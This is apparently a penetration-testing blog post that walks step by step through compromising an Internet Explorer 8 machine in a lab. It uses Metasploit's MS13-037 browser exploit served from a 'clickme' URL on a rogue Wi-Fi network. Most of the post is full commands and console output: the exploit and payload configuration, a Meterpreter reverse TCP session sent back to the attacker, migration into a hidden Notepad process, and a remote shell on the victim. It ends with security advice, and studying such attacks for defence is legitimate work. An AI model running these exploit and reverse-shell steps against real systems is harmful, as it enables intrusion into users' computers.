Seeing Red: Exploitation

Exploitation: Client-side Attack

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we performed some basic reconnaissance on our target machine and determined its operating system, running services, and even what browser was used.  In this part, we’ll set up a client-side attack and gain access to our target machine.

In recent times, client-side attacks have become a very popular way of attacking a machine.  Client-side attacks differ from server-side attacks in that they require some kind of user interaction to successfully execute the exploit.  Phishing, where the sender poses as a legitimate entity that the receiver trusts to entice them into clicking a malicious link or opening a malicious file, is an example of a client-side attack.

We’ll explore setting up a malicious website that hosts our client-side attack.  This is easily accomplished with Kali using Metasploit.  If you recall in our scenario, the target machine, Victim, has joined our “free wireless network” that we have full control over.  This means we also have control over DNS and can redirect Victim to whichever site we please.  This is important in setting up our client-side attack.

Metasploit: MS13-037

The Metasploit Framework (MSF) is an amazing collection of exploits and payloads wrapped in an easy to use command line interface.  There exists a free community-driven version and a commercial paid version.  We’ll be using the free version in Kali to set up our client-side attack.

Since we know that Victim is running Internet Explorer 8, a very old web browser, we’ll look for a client-side attack that can take advantage of this.  After some research, we learn about MS13-037.  This was a Microsoft cumulative security patch for Internet Explorer which addressed several vulnerabilities, including CVE-2013-2551.  From the CVE database description, this is a “use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 [that] allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object.”

This sounds like something we can use.  Let’s see if Metasploit has an available exploit.  We prepare Metasploit for first use by following the instructions from the Kali website.  Open a terminal window and type msfconsole to start up the Metasploit Framework console.

root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...\
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro

Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit
       =[ metasploit v4.10.0-2014102901 [core:4.10.0.pre.2014102901 api:1.0.0]]
+ -- --=[ 1369 exploits - 833 auxiliary - 233 post        ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > 

Now let’s search for an MS13-037 exploit by typing search ms13-037.

msf > search ms13-037

Matching Modules
================
   Name                                            Disclosure Date  Rank    Description
   ----                                            ---------------  ----    -----------
   exploit/windows/browser/ms13_037_svg_dashstyle  2013-03-06       normal  MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
msf > 

We’re in luck, Metasploit has an available exploit.  Type use exploit/windows/browser/ms13_037_svg_dashstyle to select the exploit and then type show options to view configurable options.

msf > use exploit/windows/browser/ms13_037_svg_dashstyle
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(ms13_037_svg_dashstyle) > 

This particular Metasploit attack creates a website that will deliver a malicious payload and give us access to our target machine.  The options shown above are specific to how we want to set up the malicious website.  We’ll leave most of these as default but change SRVPORT to 80 (this is the local port on our Attacker machine we want to listen on) and URIPATH to clickme (this is the URI path to use for serving the exploit).  To do this, we’ll type set SRVPORT 80 and set URIPATH clickme and then type show options to confirm the changes.

msf exploit(ms13_037_svg_dashstyle) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_037_svg_dashstyle) > set URIPATH clickme
URIPATH => clickme
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)
Exploit target:
   Id  Name
   --  ----
   0   Automatic

Next, let’s configure the exploit target.  It is currently set to Automatic, however, I’ve found that sometimes this doesn’t always work.  Let’s see what targets are available by typing show targets and then configure a specific one for Metasploit to use by typing set target and the number of a specific option.  We’ll again type show options to confirm our changes.

msf exploit(ms13_037_svg_dashstyle) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic
   1   IE 8 on Windows 7 SP1 with JRE ROP
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > set target 2
target => 2
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)
Exploit target:
   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > 

We set target to 2 since target 1 is for Internet Explorer with a JRE (Java Runtime Environment), which we don’t have.  So far so good, now let’s set up the malicious payload that will be delivered to the vulnerable client.  Type show payloads to view a list of payloads that are compatible with this exploit.

msf exploit(ms13_037_svg_dashstyle) > show payloads
Compatible Payloads
===================
   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/bind_tcp_rc4                                    normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_hop_http                                normal  Reflective DLL Injection, Reverse Hop HTTP Stager
   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                 normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_tcp_rc4_dns                             normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/dns_txt_query_exec                                        normal  DNS TXT Record Payload Download and Execution
   windows/download_exec                                             normal  Windows Executable Download (http,https,ftp) and Execute
   windows/exec                                                      normal  Windows Execute Command
   windows/loadlibrary                                               normal  Windows LoadLibrary Path
   windows/messagebox                                                normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/bind_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/meterpreter/reverse_hop_http                              normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP Stager
   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_https_proxy                           normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/meterpreter/reverse_tcp_rc4                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/meterpreter/reverse_tcp_rc4_dns                           normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/bind_tcp_rc4                             normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption)
   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupdllinject/reverse_tcp_rc4                          normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption)
   windows/patchupdllinject/reverse_tcp_rc4_dns                      normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager
   windows/patchupmeterpreter/bind_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/reverse_tcp_rc4                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/patchupmeterpreter/reverse_tcp_rc4_dns                    normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
   windows/shell/bind_tcp_rc4                                        normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption)
   windows/shell/reverse_hop_http                                    normal  Windows Command Shell, Reverse Hop HTTP Stager
   windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager
   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell/reverse_tcp_rc4                                     normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption)
   windows/shell/reverse_tcp_rc4_dns                                 normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                                       normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_hidden_bind_tcp                                     normal  Windows Command Shell, Hidden Bind TCP Inline
   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/bind_tcp_rc4                                       normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption)
   windows/upexec/reverse_hop_http                                   normal  Windows Upload/Execute, Reverse Hop HTTP Stager
   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager
   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/upexec/reverse_tcp_rc4                                    normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption)
   windows/upexec/reverse_tcp_rc4_dns                                normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/bind_tcp_rc4                                    normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/vncinject/reverse_hop_http                                normal  VNC Server (Reflective Injection), Reverse Hop HTTP Stager
   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager
   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   windows/vncinject/reverse_tcp_rc4                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/vncinject/reverse_tcp_rc4_dns                             normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
msf exploit(ms13_037_svg_dashstyle) > 

Wow, so many options!  My personal favorite has always been the Windows Meterpreter (Reflective Injection), Reverse TCP Stager.  Meterpreter is an amazing payload that provides a whole host of options.  From the Metasploit Unleashed tutorial:

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

I like the Reverse TCP Stager because this will open a Meterpreter session on Victim that is then sent directly back to us.  Because Victim is making the outbound connection to our Attacker machine and because most firewalls don’t block outbound connections by default, our newly created Meterpreter session will be sent back to us without being blocked by Victim’s firewall.  This is as opposed to the Bind TCP Stager which would also open a Meterpreter session on the Victim, but it would not send this session directly back to us.  Instead, the Meterpreter session on Victim would be configured to listen for connections from our Attacker.  Meaning, we’d have to make an outbound connection directly from our Attacker machine to Victim’s listening Meterpreter session.  Since most firewalls deny all by default, this connection would likely be blocked by Victim’s firewall.

All that said, let’s go ahead and use this payload by typing set payload windows/meterpreter/reverse_tcp.  Then type show options to see what payload options are configurable.

msf exploit(ms13_037_svg_dashstyle) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > 

We’ll just configure LHOST which is the listening IP address for the payload.  Since we want the Meterpreter session to be sent back to our Attacker machine, we’ll set LHOST to 10.0.1.10 by typing set LHOST 10.0.1.10.  Again, we’ll type show options to review our changes one last time before executing the exploit.

msf exploit(ms13_037_svg_dashstyle) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     10.0.1.10        yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > 

Looks like everything’s configured just the way we wanted.  Let’s create the malicious website and serve the payload by typing exploit.

msf exploit(ms13_037_svg_dashstyle) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.1.10:4444 
[*] Using URL: http://0.0.0.0:80/clickme
[*]  Local IP: http://10.0.1.10:80/clickme
[*] Server started.
msf exploit(ms13_037_svg_dashstyle) > 

Now on our Victim machine, we’ll visit the URL created, http://10.0.1.10/clickme, and see what happens.

victim_exploit

From the screenshot above, we can see that Victim was redirected to another URL and the screen appears blank as if it’s trying to load something.  Eventually, Internet Explorer crashes.

ie_crash

So what happened?  Did our exploit fail?  Let’s check our Metasploit console.

msf exploit(ms13_037_svg_dashstyle) > 
[*] 10.0.1.11        ms13_037_svg_dashstyle - Requesting: /clickme
[*] 10.0.1.11        ms13_037_svg_dashstyle - Sending HTML to info leak...
[*] 10.0.1.11        ms13_037_svg_dashstyle - Requesting: /clickme/XssWuvigzg?RvtqQ=1996386480
[*] 10.0.1.11        ms13_037_svg_dashstyle - Using ntdll ROP
[*] 10.0.1.11        ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 1 opened (10.0.1.10:4444 -> 10.0.1.11:49328) at 2014-11-11 20:22:21 -0600
[*] Session ID 1 (10.0.1.10:4444 -> 10.0.1.11:49328) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3852)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1828
[+] Successfully migrated to process 

This looks promising!  The Metasploit output above is a log of what actions occurred when Victim browsed to our malicious website.  Immediately after the Meterpreter session was created, it opened a Notepad process in the background (the user can’t see it) and then migrated itself to this Notepad process.  The reason being that once Internet Explorer crashes and is closed, the Meterpreter session dies.  Often times, an exploit will cause the target application to crash or close unexpectedly.  If the Meterpreter session is running as that process, it will then die along with it.

A quick look at the Windows Task Manager confirms that Notepad is running in the background with the PID of 1828 as noted in the Metasploit output.  We can also see the process is running as user eric.

taskmgr

Back in Metasploit, let’s view our open Meterpreter sessions by typing sessions.

msf exploit(ms13_037_svg_dashstyle) > sessions
Active sessions
===============
  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter x86/win32  WIN-FDN9DNVQ5IR\eric @ WIN-FDN9DNVQ5IR  10.0.1.10:4444 -> 10.0.1.11:49328 (10.0.1.11)

Now let’s interact with the session by typing sessions -i 1.

msf exploit(ms13_037_svg_dashstyle) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > 

As proof that we are in fact remotely connected to Victim, we can type shell to open a Windows command prompt (cmd.exe) and then type ipconfig to verify the IP address of Victim. We can see the IP address is 10.0.1.11. We can also type hostname to confirm that this is the same hostname we saw in our reconnaissance phase.

meterpreter > shell
Process 2936 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Users\eric\Desktop>ipconfig
ipconfig
Windows IP Configuration

Ethernet adapter Bluetooth Network Connection:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::a0dd:5cb7:b23d:af11%11
   IPv4 Address. . . . . . . . . . . : 10.0.1.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1
Tunnel adapter isatap.austin.rr.com:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
Tunnel adapter Local Area Connection* 13:
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:5ef5:79fd:3cfe:11c4:f5ff:fef4
   Link-local IPv6 Address . . . . . : fe80::3cfe:11c4:f5ff:fef4%13
   Default Gateway . . . . . . . . . : ::
Tunnel adapter isatap.{6657C62C-5DA5-4E0B-9C4A-2786A3F83F20}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
C:\Users\eric\Desktop>hostname
hostname
WIN-FDN9DNVQ5IR

So what have we accomplished so far?  We set up a client-side exploit by using Metasploit to craft a malicious website that exploited a vulnerability in an old version of Internet Explorer 8.  The exploit then loaded a malicious payload that opened a Meterpreter session for us that we used to remotely access Victim.  Pretty cool, huh?

Hopefully, this will make you think twice about joining “free Wi-Fi” or clicking on suspicious links.  This should also encourage you to keep your software up to date, especially your internet browser.

What’s Next

So far, we’ve seen how easy it is to exploit vulnerabilities and affirmed the importance of maintaining updated software.  In the final part of this series, we’ll further explore Meterpreter and its capabilities including privilege escalation, data exfiltration, and maintaining persistence.

Related Posts

Zeekurity Zen – Part IX: How To Update Zeek

Zeekurity Zen – Part IX: How To Update Zeek

This is part of the Zeekurity Zen Zeries on building a Zeek (formerly Bro) network sensor. Overview In our Zeek journey thus far, we've: Set up Zeek to monitor some network traffic. Used Zeek Package Manager to install packages. Configured Zeek to send logs to Splunk...

Elastic Explained: How-To Guides For The Elastic Stack

Elastic Explained: How-To Guides For The Elastic Stack

Elastic develops the popular log analytics platform, the Elastic Stack, which supports a variety of search, observability, and security use cases through its many out of the box integrations.  It's a great platform for collecting, analyzing, and visualizing data from...

How To Deploy Elastic Agent on macOS with Microsoft Intune

How To Deploy Elastic Agent on macOS with Microsoft Intune

This guide details how to deploy Elastic Agent on macOS using Intune.  For Windows, please use my companion guide. Using Elastic Agent with Elastic SIEM is a great way to secure and monitor your environment.  Not only does it provide full endpoint security...

Transform Your Business & Operate at Peak Efficiency